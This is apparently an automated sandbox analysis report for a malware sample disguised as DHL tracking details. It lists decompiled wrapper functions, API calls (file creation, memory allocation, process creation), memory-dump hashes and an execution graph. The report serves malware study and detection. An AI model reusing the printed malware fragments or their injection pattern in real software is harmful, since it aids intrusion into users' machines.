                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 5667fce54e644c444c615bbc56fe4a9fd24b775b3059d51cbd69bcc9268ffd27
                    • Instruction ID: 77d67e782ae1523f9cc1b76920e662f0b0ff1e765610986cecf53fb9dfd1526f
                    • Opcode Fuzzy Hash: 5667fce54e644c444c615bbc56fe4a9fd24b775b3059d51cbd69bcc9268ffd27
                    • Instruction Fuzzy Hash: 1AE0DF312001047BC7219BB9CCD5FD73F649F1A744F288199B98DAB302C932A625CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 255 41a670-41a6a1 call 41af60 RtlFreeHeap
                    C-Code - Quality: 100%
                    			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                    				char _t10;
                    				void* _t15;
                    
                    				_t3 = _a4 + 0xc74; // 0xc74
                    				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                    				return _t10;
                    			}

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 258 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                    C-Code - Quality: 100%
                    			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                    				int _t10;
                    				void* _t15;
                    
                    				_t7 = _a4;
                    				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                    				return _t10;
                    			}

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A807() {
                    				int _t10;
                    				void* _t15;
                    				void* _t19;
                    
                    				_t7 =  *((intOrPtr*)(_t19 + 8));
                    				E0041AF60(_t15,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 8)) + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                    				_t10 = LookupPrivilegeValueW( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
                    				return _t10;
                    			}

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 5da292a0d5175d40019c5be78652b0ec1f293971360d8095734f728da332dbab
                    • Instruction ID: 6b4d7e0425104e70e1cf0281e98c6dc005ad9588c8383b12dc07df25e9c88929
                    • Opcode Fuzzy Hash: 5da292a0d5175d40019c5be78652b0ec1f293971360d8095734f728da332dbab
                    • Instruction Fuzzy Hash: EFE04FB1200204BBDB20DF45CC84EE73769EF88354F118555F90D57241C635E9518BB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 30%
                    			E0041A6A6(int _a4, signed int _a705239657) {
                    				intOrPtr _v0;
                    				void* _v117;
                    				void* _t17;
                    				signed int _t22;
                    
                    				asm("pushad");
                    				_push(ss);
                    				asm("cmpsd");
                    				_t22 = _a705239657 * 0x55;
                    				asm("sbb cl, [ecx]");
                    				_push(_t22);
                    				_t10 = _v0;
                    				E0041AF60(_t17, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t10 + 0xa14)), 0, 0x36);
                    				ExitProcess(_a4);
                    			}

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 1a5a23dff515f3b00f93632bade69299f268e3639161ccb4c6f184e7b3169e5f
                    • Instruction ID: d0171bd44801b8c7579054756c7f0b102eb56eb248aa86418a43fde69a5024cf
                    • Opcode Fuzzy Hash: 1a5a23dff515f3b00f93632bade69299f268e3639161ccb4c6f184e7b3169e5f
                    • Instruction Fuzzy Hash: BAE086716003087FC721DF55CC86FCB7B78DF08794F158068B9185B282D570EA11CAD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A6B0(intOrPtr _a4, int _a8) {
                    				void* _t10;
                    
                    				_t5 = _a4;
                    				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                    				ExitProcess(_a8);
                    			}

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                    • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                    • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                    • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Us$: $er-A$gent$urlmon.dll
                    • API String ID: 0-1367105278
                    • Opcode ID: a678c963038246e85425396d4d9fae11693f00108ab9445269e152e0b43b235c
                    • Instruction ID: ae3ae92166d13a4669f854ef42473618d3d9be1928cb280aa057f48eec424d0a
                    • Opcode Fuzzy Hash: a678c963038246e85425396d4d9fae11693f00108ab9445269e152e0b43b235c
                    • Instruction Fuzzy Hash: 413149B2D042599BDB11CF95CC42BFEBB75EF15704F04009AEC047B241E63A5A42D7EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0151eaff83fc1f5eb6fc01b9003d80741488347930cc37e1604ed5d34acdeca1
                    • Instruction ID: f916b7ad2994dd4bf8e50d2bd3298db53fe7cf3dca30923321e5bfab20524d2c
                    • Opcode Fuzzy Hash: 0151eaff83fc1f5eb6fc01b9003d80741488347930cc37e1604ed5d34acdeca1
                    • Instruction Fuzzy Hash: C5019C628293808BEB228F15D5421F5BB70EF6626075C06DACCE15B543E22295A7C38A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                    • Instruction ID: 46278940e38c78cc032eded5860e3122ad04eb904f6cfedb6947099d73470fa8
                    • Opcode Fuzzy Hash: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                    • Instruction Fuzzy Hash: 0690026130100403D213616944146060009E7D1386F91C022E5414555D86758997F172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                    • Instruction ID: ceb868cc9e9df72b09cb739356477f8b24d0a15ff353318d04c7ca4381bcd75d
                    • Opcode Fuzzy Hash: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                    • Instruction Fuzzy Hash: 1690027124100403D252716944046060009F7D0382F91C022A4414554E86A58A9AFAA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                    • Instruction ID: ebd74727f9968b65acdb243d83b3c118fa4e5621fef973a144f97fa76ef665c3
                    • Opcode Fuzzy Hash: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                    • Instruction Fuzzy Hash: 709002A1601140434651B16948044065015F7E1342391C131A4444560C86B88899E2A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}











                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                    • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                    • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                    • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.9%
                    Dynamic/Decrypted Code Coverage:2%
                    Signature Coverage:0%
                    Total number of Nodes:588
                    Total number of Limit Nodes:70
32415->32344 32417 a19f5c 32416->32417 32418 a1af60 LdrLoadDll 32416->32418 32417->32411 32418->32417 32420 a1af60 LdrLoadDll 32419->32420 32421 a19f9c 32420->32421 32424 3369fe0 LdrInitializeThunk 32421->32424 32422 a0f354 32422->32414 32424->32422 32426 a0b2d7 32425->32426 32427 a0b040 LdrLoadDll 32426->32427 32428 a0b313 32427->32428 32428->32351 32430 a0d327 32429->32430 32438 a0f710 32430->32438 32434 a0d39b 32435 a0d3a2 32434->32435 32449 a1a2a0 LdrLoadDll 32434->32449 32435->32375 32437 a0d3b5 32437->32375 32439 a0f735 32438->32439 32450 a081a0 32439->32450 32441 a0d36f 32446 a1a6e0 32441->32446 32442 a14a50 8 API calls 32444 a0f759 32442->32444 32444->32441 32444->32442 32445 a1bdc0 2 API calls 32444->32445 32457 a0f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32444->32457 32445->32444 32447 a1af60 LdrLoadDll 32446->32447 32448 a1a6ff CreateProcessInternalW 32447->32448 32448->32434 32449->32437 32451 a0829f 32450->32451 32452 a081b5 32450->32452 32451->32444 32452->32451 32453 a14a50 8 API calls 32452->32453 32454 a08222 32453->32454 32455 a1bdc0 2 API calls 32454->32455 32456 a08249 32454->32456 32455->32456 32456->32444 32457->32444 32459 a14e50 LdrLoadDll 32458->32459 32460 a0f6ef 32459->32460 32461 a0f6f6 SetErrorMode 32460->32461 32462 a0f6fd 32460->32462 32461->32462 32462->32388 32476 a0f4a0 32463->32476 32465 a143c6 32465->32390 32467 a1bd40 2 API calls 32466->32467 32470 a08ad5 32467->32470 32468 a08cea 32468->32393 32470->32468 32495 a19880 32470->32495 32472 a0f683 32471->32472 32543 a19e90 32472->32543 32475->32400 32477 a0f4bd 32476->32477 32483 a19fc0 32477->32483 32480 a0f505 32480->32465 32484 a1af60 LdrLoadDll 32483->32484 32485 a19fdc 32484->32485 32493 33699a0 LdrInitializeThunk 32485->32493 32486 a0f4fe 32486->32480 32488 a1a010 32486->32488 32489 a1af60 LdrLoadDll 32488->32489 32490 a1a02c 32489->32490 32494 3369780 LdrInitializeThunk 32490->32494 32491 a0f52e 32491->32465 32493->32486 32494->32491 32496 a1bf90 2 API calls 
32495->32496 32497 a19897 32496->32497 32516 a09310 32497->32516 32499 a198b2 32500 a198f0 32499->32500 32501 a198d9 32499->32501 32504 a1bd40 2 API calls 32500->32504 32502 a1bdc0 2 API calls 32501->32502 32503 a198e6 32502->32503 32503->32468 32505 a1992a 32504->32505 32506 a1bd40 2 API calls 32505->32506 32507 a19943 32506->32507 32513 a19be4 32507->32513 32522 a1bd80 LdrLoadDll 32507->32522 32509 a19bc9 32510 a19bd0 32509->32510 32509->32513 32511 a1bdc0 2 API calls 32510->32511 32512 a19bda 32511->32512 32512->32468 32514 a1bdc0 2 API calls 32513->32514 32515 a19c39 32514->32515 32515->32468 32517 a09335 32516->32517 32518 a0acf0 LdrLoadDll 32517->32518 32519 a09368 32518->32519 32521 a0938d 32519->32521 32523 a0cf20 32519->32523 32521->32499 32522->32509 32524 a0cf4c 32523->32524 32525 a1a1e0 LdrLoadDll 32524->32525 32526 a0cf65 32525->32526 32527 a0cf6c 32526->32527 32534 a1a220 32526->32534 32527->32521 32531 a0cfa7 32532 a1a490 2 API calls 32531->32532 32533 a0cfca 32532->32533 32533->32521 32535 a1af60 LdrLoadDll 32534->32535 32536 a1a23c 32535->32536 32542 3369710 LdrInitializeThunk 32536->32542 32537 a0cf8f 32537->32527 32539 a1a810 32537->32539 32540 a1af60 LdrLoadDll 32539->32540 32541 a1a82f 32540->32541 32541->32531 32542->32537 32544 a1af60 LdrLoadDll 32543->32544 32545 a19eac 32544->32545 32548 3369840 LdrInitializeThunk 32545->32548 32546 a0f6ae 32546->32400 32548->32546

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 283 a1a35b-a1a376 284 a1a37c-a1a3b1 NtCreateFile 283->284 285 a1a377 call a1af60 283->285 285->284
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A1A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 82437735e1829cbc2ab766369f05a18e5e495c377fea6b7c4db7679d09851cd6
                    • Instruction ID: b1b997f37b1f5a4f9c74ddbf7b0cb460b415c4575b287cd9387b264f67066da1
                    • Opcode Fuzzy Hash: 82437735e1829cbc2ab766369f05a18e5e495c377fea6b7c4db7679d09851cd6
                    • Instruction Fuzzy Hash: 1C01C9B2205108AFDB58CF98DD85DEB77A9EF8C754F15824CFA4D97241C630E851CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 286 a1a360-a1a3b1 call a1af60 NtCreateFile
                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 00A1A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 7501417d4dc212a6854a84ae05c8d20f07784e8e5d29fe53a41dd17c82f7f5d8
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 40F0BDB2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 520 a1a40a-a1a459 call a1af60 NtReadFile
                    APIs
                    • NtReadFile.NTDLL(00A14D72,5EB65239,FFFFFFFF,00A14A31,?,?,00A14D72,?,00A14A31,FFFFFFFF,5EB65239,00A14D72,?,00000000), ref: 00A1A455
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 2d2616fd0a9010a9e57371ae451d8d14e05dbc7de9c9122704609ed0a4c1dfaa
                    • Instruction ID: 990935f7ce3b0fcf721caefb6a567d8fb2087ab04180375472d38b9360e9c0f3
                    • Opcode Fuzzy Hash: 2d2616fd0a9010a9e57371ae451d8d14e05dbc7de9c9122704609ed0a4c1dfaa
                    • Instruction Fuzzy Hash: D2F0F9B6200108AFCB04DF88CC90DEB77A9EF8C754F158248FE1D97241D630E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(00A14D72,5EB65239,FFFFFFFF,00A14A31,?,?,00A14D72,?,00A14A31,FFFFFFFF,5EB65239,00A14D72,?,00000000), ref: 00A1A455
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 685466b12cbfbc4f044f4df1169a5be27355b9a7a2186cc2d12add5259890f97
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 24F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1D97241D630E851CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A02D11,00002000,00003000,00000004), ref: 00A1A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: d74ddd8e2b6c2600f7b7fbe3e95ac90020fbdd3088ab27f8b96c5a74ae86c818
                    • Instruction ID: 0871e6e768220b76d925c0970712062322fc670d3f5fb30d12b3a71635b78c9f
                    • Opcode Fuzzy Hash: d74ddd8e2b6c2600f7b7fbe3e95ac90020fbdd3088ab27f8b96c5a74ae86c818
                    • Instruction Fuzzy Hash: 1AF0D4B6200208AFDB14DF89CC81EABB7A9EF88754F158149BA0997241C631E811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A02D11,00002000,00003000,00000004), ref: 00A1A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: a30241cbdee407b02d390c14a1c11de8f76035c23d319dcf8f376c846aa7f2b8
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: DBF015B2200208ABCB14DF89CC81EEB77ADEF88754F118148BE0C97241C630F811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00A14D50,?,?,00A14D50,00000000,FFFFFFFF), ref: 00A1A4B5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: b18e793cadc1f723a427b7eb653957b4035c16ab2a8490b329c6269b9b632a97
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: DCD01776200218ABD710EB98CC85EE77BACEF48B60F158499BA1C9B242C530FA0086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: eafd2190f740d1de6d8cb9c4df04178bbfc9304fd42abd1456c8752b91437781
                    • Instruction ID: da0d0fdff40a95b46cd5da198538217279d2c9c1e9122178299b604815be0e2d
                    • Opcode Fuzzy Hash: eafd2190f740d1de6d8cb9c4df04178bbfc9304fd42abd1456c8752b91437781
                    • Instruction Fuzzy Hash: F190027521104902E110A599544864600059BE0341F51D021A5015555EC7A988917171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 68596cbc36d5701013fd36cf3b73d5b40afd98cb054479563db2282748efb432
                    • Instruction ID: d701e37927c109bec25c96237d27a428c1a51337817044c1f8969ca781ffbe98
